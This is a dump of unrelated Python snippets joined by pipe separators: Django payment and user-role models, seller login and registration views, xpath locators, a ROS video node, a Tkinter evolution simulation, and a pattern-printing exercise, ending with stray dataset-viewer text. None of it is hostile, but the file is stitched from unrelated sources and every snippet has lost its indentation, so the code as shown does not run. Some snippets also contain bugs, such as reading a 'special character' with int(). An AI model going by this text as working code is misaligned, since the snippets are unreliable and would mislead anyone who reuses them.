class ProjectPaymentDone(models.Model):
project_name = models.CharField(max_length=50)
profile_name = models.CharField(max_length=50)
budget = models.FloatField(blank=True, null=True)
previous_payment = models.FloatField(blank=True, null=True, default=0.0)
due = models.FloatField(blank=True, null=True)
created_on = models.DateTimeField(auto_now=False, auto_now_add=True)
def __str__(self):
return self.project_name
def save_payment_done_update(sender, instance, created, **kwargs):
if created:
ProjectPaymentDone.objects.create(
project_name=instance.project_name.title,
profile_name=instance.profile_name,
budget=instance.total,
)
else:
pass
post_save.connect(save_payment_done_update, sender=ProjectServiceCharge)
|
from django.shortcuts import render, HttpResponse, redirect
from django.views.generic import TemplateView, FormView, CreateView
from django.core.exceptions import ValidationError
from firstapp.forms import ContactUsForm, RegistrationFormSeller, RegistrationForm, RegistrationFormSeller2
from django.urls import reverse_lazy, reverse
from firstapp.models import SellerAdditional, CustomUser
from django.contrib.auth.views import LoginView, LogoutView
from django.contrib.auth.mixins import LoginRequiredMixin
# Create your views here.
def index(request):
return render(request, 'seller/index.html')
class LoginViewUser(LoginView):
template_name = "seller/login.html"
#success_url = reverse_lazy('index')
class RegisterViewSeller(LoginRequiredMixin, CreateView):
template_name = 'seller/register.html'
form_class = RegistrationFormSeller2
success_url = reverse_lazy('index')
def form_valid(self, form):
user = self.request.user
user.type.append(user.Types.SELLER)
user.save()
form.instance.user = self.request.user
return super().form_valid(form)
class LogoutViewUser(LogoutView):
success_url = reverse_lazy('index')
class RegisterView(CreateView):
template_name = 'seller/registerbaseuser.html'
form_class = RegistrationForm
success_url = reverse_lazy('index') |
# -*- coding: utf-8 -*-
#姓名
jjcc_clientName_xpath = 'xpath=//*[@id="clientName"]'
#身份证号
jjcc_idCard_xpath = 'xpath=//*[@id="idCard"]'
#查询
jjcc_cx_xpath = 'xpath=//*[@id="dynamic-table_wrapper"]/div/div[2]/label/button'
#确定
jjcc_qd_xpath = 'xpath=/html/body/div[8]/div/div/div[2]/button'
|
#!/usr/bin/env python
# publie la video filmee par la camera
import rospy
from sensor_msgs.msg import Image
import cv2
from cv_bridge import CvBridge, CvBridgeError
import numpy as np
def update_image(msg):
global frame, bridge, flag
frame = bridge.imgmsg_to_cv2(msg, "mono8")
if not flag:
flag = True
# Initiate node
rospy.init_node('video_decoding')
# Node rate
# rate = rospy.Rate(10)
# Bridge object
bridge = CvBridge()
# Subscriber to compressed image
sub = rospy.Subscriber('camera/image_compressed', Image, update_image)
# Publisher
# pub = rospy.Publisher('camera/image_uncompressed', Image, queue_size=1)
frame = np.ndarray(0)
flag = False
# Publishing the frame
while not rospy.is_shutdown():
if flag:
frame2 = cv2.imdecode(frame, 1)
cv2.imshow('Image decompresse', frame2)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
# print type(frame2)
# try:
# pub.publish(bridge.cv2_to_imgmsg(frame2, "bgr8"))
# except CvBridgeError as e:
# print e
# rate.sleep()
|
from django.db import models
from django.contrib.auth.models import User
from django.db.models.signals import post_save
from django.dispatch import receiver
from pdb import set_trace
class UserType(models.Model):
STUDENT = 1
RECOMMENDER = 2
COUNSELOR = 3
REVIEWER = 4
ADMIN = 5
ROLE_CHOICES = (
(STUDENT, 'student'),
(RECOMMENDER, 'recommender'),
(COUNSELOR, 'counselor'),
(REVIEWER, 'reviewer'),
(ADMIN, 'admin'),
)
id = models.PositiveSmallIntegerField(choices=ROLE_CHOICES, primary_key=True)
def __str__(self):
return self.get_id_display()
class MeritUser(models.Model):
user = models.OneToOneField(User, on_delete=models.CASCADE)
updated_at = models.DateTimeField(auto_now=True)
user_types = models.ManyToManyField(UserType)
@receiver(post_save, sender=User)
def create_merit_user(sender, instance, created, **kwargs):
if created:
MeritUser.objects.create(user=instance)
@receiver(post_save, sender=User)
def save_merit_user(sender, instance, **kwargs):
instance.merituser.save()
|
import settings
import time
import tools
import random
from tkinter import *
from cells import Cell, Accident
root = Tk()
root.title('Evolution')
root.geometry('1265x720')
canvas = Canvas(root, width=1280, height=720, background='yellow')
canvas.pack()
grid = [[0]*settings.COL for g in range(settings.ROW)]
x1 = 0
y1 = 0
x2 = settings.CELL_X
y2 = settings.CELL_Y
cells = []
position_on_map = {}
# create a field for the existence of the cells and saving they id to the array
for idx, row in enumerate(grid):
if idx == 0 or idx == len(grid) - 1: # first and last row is grey
for col in row:
canvas.create_rectangle(x1, y1, x2, y2, fill=settings.WALL)
x1 += settings.CELL_X
x2 += settings.CELL_X
else:
for i, col in enumerate(row):
if i == 0 or i == len(row) - 1: # right and left col is grey
canvas.create_rectangle(x1, y1, x2, y2, fill=settings.WALL)
else: # other cells is white
row[i] = canvas.create_rectangle(x1, y1, x2, y2, fill=settings.EMPTY)
x1 += settings.CELL_X
x2 += settings.CELL_X
x1 = 0
x2 = settings.CELL_X
y1 += settings.CELL_Y
y2 += settings.CELL_Y
for _ in range(25):
cells.append(tools.create_cell(canvas, grid, position_on_map))
position_on_map[0] = 'wall'
for i in range(200):
food_id = tools.create_food(position_on_map, grid)
canvas.itemconfig(food_id, fill=settings.FOOD)
position_on_map[food_id] = 'food'
best_dna = []
dead_cells = []
counter = 0
start = time.clock()
while bool(cells):
canvas.update()
for cell in cells:
if len(cells) > 5:
while cell['cell'].can_move():
cell['cell'].action(canvas, position_on_map)
if cell['cell'].cell_ate():
remove_id = cell['cell'].get_ate_cell_id()
canvas.itemconfig(remove_id, fill=settings.EMPTY)
del position_on_map[remove_id]
food_id = tools.create_food(position_on_map, grid)
canvas.itemconfig(food_id, fill=settings.FOOD)
position_on_map[food_id] = 'food'
if not cell['cell'].has_health():
if len(cells) - len(dead_cells) - 1 < 5:
"""
За одну итерацию может быть убито несколько клеток.
И это число может стать меньше 5. Чтобы этого не произошло, когда пятая по счету клетка должна
умереть, цикл прекращается, чтобы она не умерла.
"""
break
else:
cell['cell'].kill(canvas, position_on_map)
dead_cells.append(cell)
else:
cell['cell'].reset_steps()
else:
break
if len(dead_cells) > 0:
for dead_cell in dead_cells:
cells.remove(dead_cell)
dead_cells.clear()
if len(cells) == 5:
for cell in cells:
best_dna.append(cell['cell'].get_dna())
cell['cell'].kill(canvas, position_on_map)
cells.clear()
for j in range(25):
cells.append(tools.create_cell(canvas, grid, position_on_map))
for idx, cell in enumerate(cells):
cell['cell'].set_dna(best_dna[idx % 5].copy())
best_dna.clear()
for idx, cell in enumerate(cells):
if idx == 5:
break
elif idx < 5:
cell['cell'].mutation()
end = time.clock()
print(end - start)
for key in position_on_map:
if position_on_map[key] == 'food':
counter += 1
print('counter-->', counter)
counter = 0
start = time.clock()
elif len(cells) < 5:
raise Accident('len smaller then 5')
canvas.update()
# time.sleep(0.01)
root.mainloop()
"""
hash map of elements on the map
{
id: 'type'
id - id of the map
type - cell type on this cell
}
"""
|
j=int(input("enter a special character :"))
for i in range(0,6):
for k in range(i+1):
print(j, end=' ')
print()
# r=int(input("enter a row: "))
# a=input("enter a special character: ")
# no_of_spaces=2*r-2
# for i in range(0,r):
# for M in range(0,no_of_spaces):
# print(end=" ")
# no_of_spaces=no_of_spaces-2
# for k in range(i+1):
# print(a, end=' ')
# print("\n")
# r=int(input("enter a row: "))
# a=input("enter a special character: ")
# no_of_spaces=2*r-2
# for i in range(0,r):
# for M in range(0,no_of_spaces):
# print(end=" ")
# no_of_spaces=no_of_spaces-2
# for k in range(i+1):
# print(a, end=' ')
# print("\n")
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.